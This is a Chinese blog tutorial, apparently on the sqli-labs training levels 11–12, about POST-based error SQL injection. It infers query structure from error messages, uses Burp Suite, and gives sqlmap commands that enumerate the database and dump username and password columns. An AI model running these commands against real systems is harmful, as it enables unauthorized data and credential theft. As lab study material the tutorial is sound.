数据库
首页 > 数据库> > sql POST基于错误的注入

sql POST基于错误的注入

作者:互联网

这里面 需要用到的工具是   Burp Suite  这款 优秀的抓包工具   然后还有sqlmap 等等  

抓包的教程  有很多 这里就不一一叙述了 

我们先来看一下 11这个关卡 

 然后 这里  可以直接输入 看返回结果 比如 

也可以 截取 数据包  然后用  

 

来发送    其中呢   我们可以 通过报错信息来猜测闭合的信息   

比如 我们输入了 是 admid\    报错是    123456'  limit 0,1  那么  

我们可以 推测  这个的信息  是 

select  name,password from admin  where name='xxxx'  and password ='xxxx'

其中 我们的 \   把 xxxx 后面的  '给转译成 正常的字符  那么  是由  password 第一个'来闭合的  那么 后面的 123456’自然的就报错了  那么 这里我们就有很多要写的东西了

我们直接 这样 

构造了一个闭合   就直接 可以显示出来了   正确的

然后我们看 12 

  

 这里的报错是   “123456\”  那么 

我们可以 构造闭合 

登陆成功@!!!

然后就是 就   用sqlmap 跑程序 

首先把数据包复制下来

然后 用sqlmap 跑一下

 

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E --current-db --batch

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -D security --tables --batch 

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users --columns --batch

 py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users -C'username,password' --dump  --batch

 

标签:sqlmap,基于,technique,py,Desktop,uname,报错,sql,POST
来源: https://blog.csdn.net/qq_41071646/article/details/87876013